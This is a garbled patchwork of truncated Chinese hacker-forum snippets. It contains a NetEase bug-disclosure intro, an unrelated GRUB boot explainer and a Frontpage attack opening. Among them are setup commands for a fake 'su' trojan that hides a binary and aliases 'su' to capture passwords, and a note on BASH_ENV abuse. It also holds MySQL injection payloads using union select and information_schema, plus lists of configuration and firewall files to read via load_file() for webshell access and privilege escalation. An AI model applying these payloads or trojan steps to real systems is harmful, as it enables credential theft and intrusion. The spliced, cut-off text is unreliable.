作者:刺

因为我认识的朋友里面国内各大网站都有，前两天发了校内网的bug，可是现在多了个校内网的朋友，不太好意思发那些例子。正好不认识网易的人，那就发网易的漏洞做典型吧，也许还能让我们的whitehat社区趁机扩大下。

先说跨域实现的笔记，再讲漏洞。

今天本来不是研究这个跨域实现问题，不过顺道看到了这个，做下笔记，暂时还没想到有什么安全隐患，哪位有创意的朋友可以仔细思考下里面是否存在问题，我也会找时间好好想想。

正常跨域有很多方式，我在精武门的演讲里也

修改fakesu.c 去掉了错误提示.

/* 
* fakessh.c ; 
* by LoveFly <wr

作者xiaoyu

通常情况下，我们在执行bash脚本的时候，有一个执行过程，其中有一点比较重要:
如果BASH_ENV被设置的话，它就会执行BASH_ENV指向的脚本

    以下是引用片段：
    [xiaoyu@localdomain ~]$ echo $BASH_ENV
    [xiaoyu@localdomain ~]$ export BASH_ENV="/tmp/.bashrc"
    [xiaoyu@localdomain ~]$ echo $BASH_ENV
    /tmp/.bashrc
    [xiaoyu@localdomain ~]

/*
* kpr-fakesu.c V0.9beta167 ;P
* by koper <koper@linuxmail.org>
*
* Setting up:
* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c
* admin@host:~$ mv .su /var/tmp/.su
* admin@host:~$ cp .bash_profile .wgetrc
* admin@host:~$ echo "alias su=/var/tmp/.su">

1. GRUB 介绍
计算机在启动的时候，首先由BIOS中的程序执行自检，自检通过后，就根据CMOS的配置找到第一个可启动磁盘的MBR中的Boot Loader程序（一般在启动盘的第一个物理扇区，占416字节），并把控制权交给Boot Loader，由Boot Loader进一步完成操作系统内核的加载。当Boot Loader找到内核之后，就把控制权交给操作系统内核，由内核继续完成系统的启动。
可以看出，Boot Loader 是计算机启动中第二个要执行的程序，它是引导操作系统的关键程序。可以引导操作系统的Boot Loader主要有LiLo、GRUB以及Windows下的MBR程序。

作者：Sai52[B.H.S.T]
blog：www.sai52.com

文章已发表于《黑客防线》2008年第11期 转载请注明

MYSQL注入中，load_file()函数在获得webshell以及提权过程中起着十分重要的作用，常被用来读取各种配置文件，如：
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略

information_schema在MYSQL的这个库保存其他库的信息，爆出他的内容 你就不用怕猜不到表名和字段了:D 不过有权限限制 root..

爆出其他库的库名,limit函数用法不要说你不会用:
and 1=2 union select 1,2,schema_name,4,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1/*

把爆出来的库名转成16禁止作为查询条件,爆他的表名:
/**/union/**/select/**/1,2,3,TABLE_NAME,5,6,7,8,9,10/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=0x627370/**/limit/**/0,1/*

把爆出来的

下面，我们来看一看第一个采用Frontpage客户机软件进行的攻击。支持Frontpage的服务器会有若干个以字母”_vti”开头的工作目录。在任何常用的搜索引擎上搜索默认的Frontpage目录会得到大量从引擎上返回的信息。然后，入侵者就能对这些